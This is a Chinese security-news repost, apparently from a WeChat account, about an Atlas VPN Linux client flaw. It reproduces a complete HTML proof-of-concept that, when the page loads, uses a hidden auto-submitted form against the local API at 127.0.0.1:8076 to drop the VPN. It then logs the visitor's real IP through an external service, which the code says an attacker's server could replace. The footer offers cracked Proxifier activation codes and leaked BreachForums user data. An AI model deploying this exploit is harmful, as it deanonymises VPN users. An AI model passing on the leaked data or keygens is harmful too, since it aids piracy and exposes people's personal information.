媒体 9月5日
称,影响 Linux客户端
的 Atlas VPN
漏洞,仅通过访问网站即可泄露用户的真实IP
地址。
用户 Educational-Map-8145
在 Reddit
上发布了一个 PoC
,演示如何利用 Atlas VPN Linux API
来泄露用户的 IP
地址。
该 PoC
创建了一个由 JavaScript
自动提交的隐藏表单,连接到 API
终端URL
http://127.0.0.1:8076/connection/stop
,访问该 API
终端时,它会自动终止隐藏用户 IP
地址的 Atlas VPN
会话。一旦 VPN
连接断开,PoC
就会连接到 api.ipify.org
,记录访问者的实际 IP
地址。
Atlas VPN
承诺将尽快发布修复程序
Poc:
<html>
<head>
<title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>
</head>
<body>
<pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=
You should be running the atlasvpn linux client and be connected to a VPN.
Use <b>atlasvpn connect</b> to connect to a VPN server.
</code></pre>
<iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>
<form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">
<button type="submit" style="display: none"></button>
</form>
<script>
window._currentIP = false;
// Run main exploit code
window.addEventListener('load', function () {
addIPToLog();
setTimeout(triggerFormSubmission, 1000);
setTimeout(addIPToLog, 3000);
});
// Blind CORS request to atlasvpnd to disconnect the VPN
function triggerFormSubmission() {
var logDiv = document.getElementById('log');
logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...n";
document.getElementById('stopForm').submit();
}
// Gets IP from ipfy API (this, of course, could be your server)
function addIPToLog() {
var logDiv = document.getElementById('log');
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://api.ipify.org?format=json', true);
xhr.onload = function () {
var ipAddress = window._currentIP;
if (xhr.status === 200) {
var response = JSON.parse(xhr.responseText);
ipAddress = response.ip;
logDiv.innerHTML += '[?] Current IP:' + ipAddress + "n";
} else {
logDiv.innerHTML += '[-] Error fetching IP address.n';
}
// Check if the IP changed. If yes: Success.
if (window._currentIP && window._currentIP != ipAddress) {
logDiv.innerHTML += "[+] Successfully disconnected VPN."
}
if (window._currentIP && window._currentIP == ipAddress) {
logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."
}
// Save IP for next iteration.
window._currentIP = ipAddress;
};
xhr.send();
}
</script>
</body>
</html>
关注公众号后台回复 0001
领取Windows Proxifier激活码,0002
领取Mac Proxifier激活码,0003
获取无需登录在线即用的New Bing地址,0004
获取BreachForums暗网论坛泄露用户数据
加我微信好友,邀请你进交流群
往期推荐
多个Notepad++漏洞允许执行任意代码
国产之光IDE,自带国产特色VIP功能!
如何入门安全(火柴人事件的提醒)
某微0click严重漏洞
无需复杂操作,在线即用的New Bing!
CCTV主站被做黑帽SEO
CobaltStrike非注入截屏BOF
最新版Proxifier注册码分享
中国顶级程序员"左耳朵耗子"辞世
文章号,欢迎关注
原文始发于微信公众号(刨洞之眼):Atlas VPN存在泄露用户真实IP地址漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论